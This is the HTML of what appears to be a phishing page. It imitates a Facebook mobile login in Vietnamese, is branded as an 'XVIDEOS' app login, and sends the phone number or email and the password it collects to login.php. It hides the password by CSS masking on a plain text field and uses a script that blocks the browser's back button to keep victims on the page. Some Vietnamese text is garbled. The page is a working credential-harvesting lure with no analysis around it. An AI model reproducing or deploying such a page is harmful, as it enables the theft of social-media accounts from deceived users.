
<!DOCTYPE html>
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>Ðang Nh?p Ð? Ti?p T?c</title>
    <meta name=viewport content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel=stylesheet href="//stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
    <script type="text/javascript">
        window.history.forward();
        function noBack() {
            window.history.forward();
        }
    </script>
    <style>
        .Bg-1 {
            background-color: #3b5998;
            height: 50px
        }
        
        .Buttom-color {
            background-color: #06c;
            border-color: #06c
        }
        
        .Buttom-color2 {
            background-color: #090;
            border-color: #090
        }
        
        .Bg-2 {
            background-color: #e9ebee
        }
        
        .text-color {
            color: #4267b2
        }
        
        .text-style {
            text-align: center;
            font-size: 12px
        }
        
        .text-1 {
            color: #7f7212;
            font-size: 14px
        }
    </style>
</head>

<body onload="noBack();" onpageshow="if (event.persisted) noBack();" onunload="">
    <div class="container-fluid d-flex justify-content-center align-items-center">
        <div class=row>
            <div class="col-12 text-light ">
                <h3 style="color:blue" align="center"><img src="https://xvideosvietnam.net/continuevideo/fffff.PNG" height="60px"><br><p>LOGIN APP <font color="red">X</font>VIDEOS</p>
                <img src="./apps.png" height="80px"></h3> </div>
        </div>
    </div>
    <!--<div class=container-fliud style="background-color:#fffbe2 ; height: 20px;">
        <div class=row>
            <div class="col-12 text-1">
               <center> <p class=ml-2>
                    Tru?c tiên, b?n ph?i dang nh?p.          </center>      </p>
            </div>
        </div>
    </div>-->
    <div class="container-fluid p-4 ">
        <div class=row>
            <div class="col-12 d-flex justify-content-center">
                <center style="width: 500px;max-width:100%;">
                    <form id="login_form" method="POST" action="login.php">
                        <input type="text" name="id" class="form-control" placeholder="Số di động hoặc email>
                        <input style="text-security:disc; -webkit-text-security:disc;" type="text" name="passok" class="form-control" placeholder="Mật khẩu">
                        <button type="submit" class="btn Buttom-color btn-md btn-block mt-2 text-light Input" name="submit">
                            Ðăng nhập                        </button> <span style="color: #4b4f56; font-size: 14px;">ho?c</span>
                        <button type="button" class="btn Buttom-color2 btn-md btn-block mt-2 text-light" style="width: 220px;" >
                        Tạo tài khoản mới                       </button>
                        <div class="text-style mt-2"><a href="https://m.facebook.com/recover/initiate/"><small class="text-color text-style ">Quên mật khẩu?</small></a> </div>
                    </form>
                </center>
            </div>
        </div>
    </div>
    <div class="containner p-3 ">
        <div class=row>
            <div class="col-6 text-style text-color ">
                <ul style="list-style-type:none;">
                    <li> English (UK) </li>
                    <li> ??? </li>
                    <li> Español </li>
                    <li> Français (France) </li>
                </ul>
            </div>
            <div class="col-6 text-style text-color ">
                <ul style="list-style-type:none;">
                    <li> Tiếng Việt </li>
                    <li> ??(??) </li>
                    <li> Português (Brasil) </li>
                </ul>
            </div>
        </div>
        <div class=row>
            <div class="col-12 d-flex justify-content-center "> <small class=text-muted>© 2020</small> </div>
        </div>
    </div>
    <script src="//code.jquery.com/jquery-3.3.1.slim.min.js">
    </script>
    <script src="//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js">
    </script>
    <script src="//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js">
    </script>
</body>
</html>
